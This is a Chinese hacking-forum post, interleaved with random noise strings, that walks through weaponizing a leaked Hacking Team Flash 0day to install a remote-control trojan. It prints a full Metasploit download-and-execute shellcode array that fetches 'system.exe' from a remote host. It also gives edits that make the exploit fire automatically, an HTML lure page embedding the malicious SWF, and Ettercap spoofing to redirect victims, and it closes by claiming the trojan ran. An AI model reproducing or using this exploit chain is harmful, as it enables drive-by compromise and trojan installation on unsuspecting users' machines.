找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1561|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, @* X9 l% M: e! r2 Y: a 三、flash 0day之手工代码修改制作下载者实例入侵演示 - G9 |- a2 ~- s0 T" r/ d6 y

! A7 k! x( s! M5 w( B

0 V, y' _4 I2 f( q7 {1 f+ b, B4 l 利用到的工具: : M9 Y P6 t Q" \4 D

$ A$ Z7 k$ A; R, q

. d% O% R+ T: n Msf ) M% d1 F7 B; ?. p: a

2 ^- j9 b2 ]/ h- [7 |

N, U4 G2 C Q- i" g- C Ettercap ' Q: B) g0 Z A

& a+ a( A- w1 f$ I+ ^

( D) A- H/ g- \, Z) f; u Adobe Flash CS6 1 m2 q4 B$ ]$ P/ @% I8 i, n2 l3 y* e5 o

! {: G j' ]/ p& q* t

! \8 a$ ^9 }& `8 P* ?2 x Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 5 ^3 d; C Y+ |7 ?0 W, ~5 [

. k# g+ r* h: t0 M

7 T/ G3 E! h W! }( l 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ) F7 ?) o% r. V7 }/ d

6 R9 L+ H, N& \

+ `( f L! a. N: Q; B1 u0 {7 O2 R 如图: - K* C: s* S2 K! X- W8 o5 N

( z9 K0 E+ X! h* a' y2 M1 D: z8 T+ z

1 q1 g7 n7 Y- }: \+ d   % W. s1 U; y* _ x2 }& d

; X( z c& k$ y2 h2 y* F

" x) }8 l) f6 }! f' d   9 V. x- o$ v, w" c+ Y& \

3 R3 l2 k# @6 t. K) ^5 I

* l/ H* q. Y1 Z) Z 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: % r! d/ W ]( D+ L- ]% W! x% F$ b

% e. j0 w# F3 C$ R

3 O' g: s. x# t, i   - O" a1 E" \& m! ~9 b

. I+ m8 Y" R1 z" @2 v1 r! a

4 E; E, ?' }1 j s/ I8 ]   % N# l% l) w. z% x4 n: y$ l) d3 L

* }) k2 ~3 c9 Z; m1 h

* H5 N9 ?+ h4 |& p3 H2 t4 G" ~ 然后执行generate -t dword生成shellcode,如下: 1 v+ b% R2 E. e, W' H b

, b$ ~; Z* y, H& b5 F

& K; z4 s* d$ K* y# x/ m   4 L }/ C4 _" C/ d" @4 K9 i1 |7 w

; y6 B) J4 u7 ~/ O! o: f$ V _

5 l/ ?) x; {4 Y9 j* \ 复制代码到文本下便于我们一会编辑flash exp,如下: 3 s+ e' R: u. K. S( _

0 ]( p. M7 J( F* t0 k0 w1 P

# z; O" f$ V1 p6 E4 {# p6 R 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, + _. o9 f) Q) _- F& y8 ]4 [

- y( r$ N2 n8 p5 P/ ~5 V; G

* H8 s4 ^% j6 F) C 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 7 @7 z6 O; q0 o9 F; X/ o

h7 B2 e7 n3 S& {

% z& U! ?0 R* w6 q. A+ \: \& v 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ' p- i V! b2 B* m/ \/ B

9 ]% T: [. i8 s; i" ^/ Z

3 F2 E" ]% |1 R4 _$ o 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, $ C: c8 e2 H1 ^0 z5 j0 z+ s

/ D; R7 t3 q4 z( N/ \

9 x' F X- `4 o1 F% [ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ! Q6 W2 t: s- T* j4 K2 r

, g, F6 x: j1 V( [

9 V8 k o6 M( o) U; Y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, , G7 @1 M6 ~9 C7 E4 a9 G

: c: p) r& h: a6 B- R

; S9 l% u" c- R4 r) ?+ p 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . ?& ?: q" G# W+ b! e

$ a' O* o+ o4 k. f" P" S5 [

$ |$ p+ \8 C! i9 p! | 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 2 v. }# E, B, a& A0 m7 J

0 N6 _4 J1 B4 x, M5 l

% `5 r% t! U; O' b 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, % p* l/ ^( c- M# E

$ ?! }# p: H6 g' ?& Q) J

" M7 R" ^5 G( d, S" v& L* Z. U* m4 O 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, b$ a: w3 N" r' H3 \9 O4 o3 H

+ f. N+ V+ E- [# Z

" w i( `& l0 W$ E* W 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, % E( s" v6 ], q

# \$ _- [& Z' l v2 ?7 A$ @! {! d

6 Y% f- F; _, n 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, . y3 q7 g! p4 q" @8 m9 M& D

. U; @, m* t& z* T9 v/ l- V, k

7 Z O8 P; Q# ^( m7 H 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 3 b/ H# v+ q! C/ g O* ~2 m

4 N1 f) m/ k; J+ x

) |% W, u# t# t7 d) t$ \ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 3 z C/ ^5 I$ o- u8 q

d; n) f' T" P% \5 z3 H4 R

' S' R, `0 W, r# \6 X   * {' X$ i! t& ?' y% |6 }5 B

' o+ `( F+ o1 S" ^& V; i: L$ z

' T4 w' o. c# Y! W1 M   - l: l( T6 A$ R- W

( D0 j' @8 T% j/ I2 q2 E T6 T

0 C; }3 a3 h: y: ~( ` K+ P 下面我们来修改flash 0day exp,需要修改三个文件,分别为: " X. L( h$ v: E ^; p) S) C

! t/ k' c0 I9 p {8 E" E+ F

& O& o/ T7 Z2 z, D' W: | @; |& c# q   $ x7 b5 ]% t- T1 H& P9 y4 J

4 \5 U- @5 N2 w# h( q5 C1 z5 c

9 ^' z9 P* b- j6 ?/ z; ?: J9 T 先修改ShellWin32.as,部分源代码如图: 1 J- L! B6 Q y" r; d- ]; c

0 w! g5 q5 y [7 T( c( B

9 [& ]% u3 Z: U4 {7 U   5 b# P, T' }2 a# e' @( C3 q

- n$ a& p9 E8 C" u7 d1 k$ X5 t5 X

) K9 J- U% O. P4 X1 z6 u 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 1 ?) |. _* I% x$ J

3 }4 ~# L0 s2 w3 @+ R. u6 ^- @5 L

9 A0 x& l- V9 h1 p% X; S& N3 u& K   1 T) B2 i7 z6 D+ D

& B( P/ d3 t$ W' M+ G4 x

: [; x3 ^7 K. }( B9 T 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: $ j5 x5 r6 w' m( z, l% W( _

# [+ f, Z- q& n Z

' x3 K; H8 ?# E+ X% Z5 d   / _) H. `+ J9 [, @" x

' c6 {+ u) T$ p; q

& U4 S, [( S( k" C 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 Q' `- L% ^! c! R4 \2 Y4 p' ~

- b+ _+ b. l" D( _

C. P3 V8 H2 `% `/ ?* Y. ~   # M, T3 s: I" _6 u" o3 j3 b( {5 h

, J* b3 ]3 V% X

9 O8 C6 T0 d( d   8 U8 n' r I3 \4 n

: Q0 b5 |6 |* ]; B( |% R1 {; H- z

" v- i. i% i- H. P% d+ |   4 g: W, s+ k* M" {$ V3 O7 J: M8 y

8 R T' E7 E% q

^4 n- m: l3 S9 ^ 然后点保存,下面我们来编译一下,打开 ) M) M# p) C" @

$ Z6 m& f( w$ K0 a/ \ K

' f% N$ D1 n# P: d4 i! i' t. K exp1.fla然后点文件-发布,看看编译没错误 1 X' r7 X7 h8 g: `: I7 L

+ U$ J% r1 K: _ C& i% ~) T

& ^9 u8 V/ M; i4 O- y% ~   1 `9 B% s, x6 Y8 V2 l' `- U

( x6 L; y; G0 D$ w$ w

; ?4 o) X1 s" R& J   * l; U& f9 _, f4 |- ^6 D

% v& h6 a" R, {

* b5 t, ~' ?3 a) o; G! Y. c8 y   N/ i" n. j1 J9 n% b3 A; _1 Z

: ` C- D. q' p; P; o

m' c, w! a( w9 i2 W1 L( T   * P ?0 A# _6 w L& ]0 ?

) e/ R6 \4 ~! ]

9 J, N7 m) i) M% ^1 d 然后我们把生成的 & B; Y9 o) q# z

5 s" L7 s8 S/ y. d, L

}$ Z6 [9 d( } exp1.swf丢到kailinux /var/www/html下: ~; _. d2 g8 W: m1 o* o; P

& k+ m: s3 n: d: ?

; ^% I e* ^, t/ g3 d 然后把这段代码好好编辑一下 ! z; Y' b1 e& l

/ K; @- s9 Q& f; b6 K

, z; z8 Z) k: F7 P) |   3 e: {+ l) ~ l

\; E# p. L8 V; H+ h6 N+ r

5 N$ @* |3 I' @: D   % N% b# o; C, b/ [; B) J/ L$ f! X

- R1 I% ~2 g- L }2 ?

, w% ?" M1 y/ z# S- C5 M   4 U; M n0 s) D7 b" Q+ I: Q

+ j8 C5 j! q n' l1 W) ]7 Y" ^6 u" E

; a: C' U) ]0 A" M+ |9 b9 M. x9 v   % K7 B6 d: a. q' D4 m8 o

+ t* m5 {6 i; r+ \+ `

2 Q* C) ~. d# E# g0 {: S* R7 D   7 v- L# t7 J- e. x2 r; L

+ n) [' k+ p" ~# n) v! Z% R

! w. R. i# u* q1 D$ i8 z& O! i   9 [- X" S7 {2 F. L& p5 }

7 v( j/ h4 @' X* K$ `3 {1 m

( e! |( ^; G& K! } <!DOCTYPE html> / k. l$ h) P+ X8 m

8 X) d0 C3 ?1 ^' O# D* ]

. G- |; c2 o, C. i <html> # j4 {1 S8 r# `; G( P5 c, {

( @% F; N* g4 w2 Q4 y1 c. i

# p+ N) ^$ Y% W! } <head> ' V/ H# G( \3 O; j" }/ t

9 a. p/ Z! y D4 I; ~

( Q! C0 ?5 c0 ]" V, ^ <meta http-equiv="Content-Type" content="text/html; # U4 \6 ?" e3 l2 ]! b0 {/ ~

4 W! E$ p: ~$ F7 \ }# ? F

5 t, {+ x! r2 V! Q charset=utf-8"/> ' w6 y' C8 w2 z& `9 k

, W2 r1 y+ D; D2 V' @/ S

1 e+ w5 U T6 T6 Q </head> 7 J; h" G2 Y! r" v. N- a3 S9 _$ {

& ~% `/ l) H1 {6 g6 y

/ q1 `2 D& |. q7 }9 U' V. i5 @ <body> $ W" [# r* t' j6 Z7 F; Y

# _$ f9 e6 |2 B& b

2 {. q$ @' R; B2 _( n/ e# J+ d <h2> Please wait, the requested page is loading...</h2> W5 m' ?8 `% T8 I% R0 G! E

3 ?% r& Q, ^7 ~7 m' X

* f6 I* [- E) y, c( }. r <br> % s5 j$ {) ]& A; a! w

1 n% A- F! X, h3 D$ ^

, Z# E6 B( c4 I( S- s <OBJECT 0 }4 a/ z/ n/ Z

& p! B8 D( k( X a% _/ i

! \, l) s3 S4 { classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ( g5 U5 @6 z9 a% C" s1 ]( r

; y6 Z4 U) g% T! _% B0 ?) W q' {

# B7 M" r4 i& C/ j& D% F& C VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 ~5 U8 \4 l/ f$ l6 ]

* g8 N1 v/ ~9 d# L/ Y: {7 {3 }' {+ f

3 r) K: k& d1 i) a: P) T% s </body> 9 L* T6 p9 ]. P0 C9 w, L( [! |

* o, S. p7 `/ p0 p

. \: {- r0 T- R6 s4 { <script> ! z* ~, j) \# f8 \( M

3 I) c' T6 s2 J- Y

% L1 R. G4 ]$ M+ c1 f1 l     setTimeout(function () { : F& A0 [+ `7 N: j9 s& f

# k* p8 m' Z" H9 Q1 C

: X0 J9 b% _ B2 I( c" }          7 k# j# ]0 A+ g- {

/ j) c0 U2 }. P2 K2 ?

( X' f4 L% D/ ~; q# r& f6 v( M window.location.reload(); 9 L* w) E; X6 | [ V( A _

9 p' C( W" B& y9 K

# k5 S6 F b% _- r     }, 10000); - W. |3 d! z F! \

! M. {: d+ q* |8 T( u4 t

( t3 O9 M) U5 x( A2 T# x" }/ y   ) C# T8 o& ~- Y: x5 Q, O* `

2 v# F/ q P9 w: E2 X

6 T: V; i0 @5 L* D </script> # p3 F5 z- {* B7 Z1 m1 M

7 k& K3 X( u+ r

: m3 T1 g K; ]) |' W </html> ; ^. y1 {# R5 E! h5 H+ U/ c) n$ \

+ Z8 l. O) B8 J9 S

: N3 \4 ~; w4 f2 z6 p   ' H3 f* T9 \8 {( ^5 `+ E* f, n

8 x8 X1 P& g% T; ?! W

5 h2 X S6 ~* T% C3 C 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: * z% _0 B( P; Z5 s" E( T

: T3 Y% J4 G. l. h

0 f6 F) K, C2 B R& |9 R* L! J: r; ]   / O' N. d# Y7 t: S. k8 @

3 Z+ [7 B1 \" { T( v3 c

# A" z( w0 S P   + X7 g I- B8 [# A% f+ }) G

|0 e7 d% ?* i; d( T/ [2 _

% @% D: `5 u. L" n! O3 b$ n   ! g8 i; s c/ @

5 a8 x% Q# B/ X" B3 H0 L

% u+ n/ |% N8 R8 ?   ( o- k, N; Q, r$ ^, W& N

- j" ~4 l& O6 ^( C, }, v/ g# e- m" x

9 m# X# t! A1 R# l: N0 Y; M   / ^# f) j0 Y' p( o& T

5 [: R" G- W6 o8 K/ _- s. E4 `

* D( l- G, |/ I# h# ~/ { 下面我们用ettercap欺骗如图: & w E* D: Y5 s

- B2 ?0 X& o; ^# Y

+ F3 }9 |" K6 w: J& I9 T2 U. P   ; M9 A8 B( L; s& M- q# k2 k6 q

B, e1 e- @( p' h' Q/ Q$ s

' G8 ~2 F1 L) c \3 A- s. I   $ Y l; v' j4 S* f# r0 _4 t: L) Q

5 e" |$ Q, _7 u" V5 l: J0 c5 H$ i8 a E

) i" y# ]4 A3 A' l- b6 \& w# \ 下面我们随便访问个网站看看: $ [: f1 \- c a- f6 Z

, D. ~1 a8 |( l0 x

4 @1 o0 u3 S$ b' j! k( p( g/ S 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 7 P2 s \$ {8 c$ s% }1 \+ B

2 C$ S1 M4 Y2 T* \4 f% f# ~2 l

1 t' }" g) N* j! @/ e4 b   ! l! a, x8 E0 p, c/ E

: P- t, G7 W% @/ ~: H/ f$ k: B* G! c5 E

* q. ^6 w8 y4 R z- [" M) F 我们看另一台, 6 H! @4 R. j4 W2 d

# p% O S0 g9 ?+ v9 m l

4 O5 h/ Q0 z# S& ?' B 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 8 \2 U6 [& a& j0 X8 L

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表